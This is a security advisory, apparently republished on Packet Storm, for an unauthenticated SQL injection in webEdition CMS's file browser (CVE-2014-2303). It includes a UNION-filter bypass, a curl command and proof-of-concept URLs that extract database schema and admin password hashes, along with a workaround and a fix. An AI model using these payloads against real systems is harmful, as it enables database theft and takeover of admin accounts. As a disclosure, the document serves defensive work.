what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

webEdition CMS 6.3.8.0 svn6985 SQL Injection

webEdition CMS 6.3.8.0 svn6985 SQL Injection
Posted May 30, 2014
Site redteam-pentesting.de

RedTeam Pentesting discovered an SQL injection vulnerability in the file browser component of webEdition CMS during a penetration test. Unauthenticated attackers can get read-only access on the SQL database used by webEdition and read for example password hashes used by administrative accounts. webEdition versions 6.3.8.0 svn6985 down to 6.3.3.0 is affected.

tags | exploit, sql injection
advisories | CVE-2014-2303
SHA-256 | 81fbc39f2a3459ae92ce585e8a2427adfa9b14d16218f83cd98c65bec9a49df0

webEdition CMS 6.3.8.0 svn6985 SQL Injection

Change Mirror Download
Advisory: SQL Injection in webEdition CMS File Browser

RedTeam Pentesting discovered an SQL injection vulnerability in the file
browser component of webEdition CMS during a penetration test.
Unauthenticated attackers can get read-only access on the SQL database
used by webEdition and read for example password hashes used by
administrative accounts.


Details
=======

Product: webEdition CMS
Affected Versions: webEdition 6.3.8.0 svn6985 down to 6.3.3.0,
probably earlier versions, too
Fixed Versions: 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: SQL Injection
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005
Advisory Status: published
CVE: CVE-2014-2303
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303


Introduction
============

"webEdition is a flexible CMS for companies of every size. It offers a
great amount of functionality and can be flexibly customized for
individual needs. It is ideally suited for users who want to operate
their web-site comfortably. Even the creation of custom web-applications
is easily possible with webEdition."

(translated from webEdition homepage)


More Details
============

The webEdition CMS contains a file browser component that allows
browsing parts of the website's filesystem structure. It is usually
reachable under the following URL:

http://www.example.com/webEdition/we_fs.php

When browsing to individual directories, HTTP GET requests such as the
following are sent to the web server:

GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20
DESC,%20Text&filter= HTTP/1.1
Host: www.example.com
[...]

The server responds with JavaScript code that updates the directory
listing:

<script>
top.clearEntries();
top.addEntry(13,"folder.gif","careers",1,"/en/careers");
top.addEntry(14,"folder.gif","company",1,"/en/company");
top.addEntry(15,"folder.gif","contact",1,"/en/contact");
top.addEntry(20,"we_dokument.gif","index.php",0,"/en/index.php");
top.writeBody(top.fsbody.document);
[...]
</script>

The requests which are sent to retrieve this information contain two
interesting parameters: "table" with a value of "tblFile" which appears
to name a database table, and the parameter "order" with a value of
"IsFolder DESC, Text", which contains parts of an SQL ORDER BY clause.
In combination, these two parameters can be used to perform SQL
injection attacks. It appears that they are embedded into an SQL query
in a similar manner as follows:

SELECT ID,ParentID,Text,Path,IsFolder,Icon
FROM tblFile
WHERE [...]
ORDER BY IsFolder DESC, Text

Using a "table" parameter value of "tblFile WHERE 1=1 /*" and an "order"
parameter value of "*/", will result in a query similar to the
following:

SELECT ID,ParentID,Text,Path,IsFolder,Icon
FROM tblFile WHERE 1=1 /*
WHERE [...]
ORDER BY */

The queries executed by the CMS retrieve six columns, which can be seen
in the application's source code, or by injecting ORDER BY clauses with
numeric column indexes into the query. Knowing the number of columns in
a query, it is typically possible to use the UNION operator to obtain
additional information, for example from other tables. As a security
measure, webEdition implements filtering of the UNION keyword.

The web application checks whether the text "UNION" is part of
user-supplied information that is entered into database queries and then
blocks such queries. This behaviour is implemented in the file

/webEdition/we/include/we_classes/database/we_database_base.class.php
using the function
preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings)

The CMS first checks whether the text "UNION" appears in the query
string in any combination of upper- and lowercase characters. If that is
the case, a regular expression is used to determine whether the word
"UNION" appears in any context that is deemed dangerous by the
application developers. However, the underlying MySQL database system
supports embedding MySQL-specific query code within comments that
contain an exclamation mark ("!")
(see https://dev.mysql.com/doc/refman/5.5/en/comments.html).

For example, a query like

SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */

will yield no results on other database systems, but will return all
rows on MySQL. Likewise, the text "/*!UNION*/", which is not caught by
the aforementioned regular expression, can be used instead of just
"UNION" on MySQL, thus enabling injections that use the UNION operator:

$ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\
'&table=tblFile+WHERE+1=0+/*!UNION*/+SELECT+1,2,3,4,5,6/*&order=*/'
<script>
top.clearEntries();
top.addEntry(1,"6","3",5,"4");
[...]


Proof of Concept
================

The following URL lists the configured tables and their columns from the
webEdition database:

http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+
1=0+/*!UNION*/+SELECT+1,2,TABLE_NAME,4,COLUMN_NAME,TABLE_SCHEMA+
FROM+INFORMATION_SCHEMA.COLUMNS/*&order=*/

The following URL retrieves configured users and hashed passwords from
the webEdition database:

http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+
1=0+/*!UNION*/+SELECT+1,2,passwd,4,5,username+FROM+tblUser/*&order=*/


Workaround
==========

Disable the file browser component of webEdition, for example by
deleting we_fs.php.


Fix
===

Update to a version with the suffix -s1. Those versions are available as
updates for releases between 6.2.7 and 6.3.8. The newest, updated
version would therefore be 6.3.8-s1.

Note that the version check of webEdition might tell you that there is
no update available and that you are running Version "6.3.8 (6.3.8.0
Release, SVN-Revision 6985). It will still tell you that the newest
available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so
you can use the "Update-Repetition" function to get the fix for this
vulnerability.


Security Risk
=============

Attackers can exploit this SQL injection vulnerability to read contents
of the webEdition database. This database contains, among published and
potentially unpublished content of the CMS, the credentials of the
administrative users of the CMS. If an attacker manages to find a
password for a password hash extracted using this SQL injection
vulnerability, the attacker could use these credentials to gain
administrative privileges in the CMS. This poses a high risk.


Timeline
========

2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-05-20 Vendor announces fixed versions
2014-05-28 Advisory released


References
==========

http://www.webedition.org/de/aktuelles/webedition-cms/
Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht
(German)


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close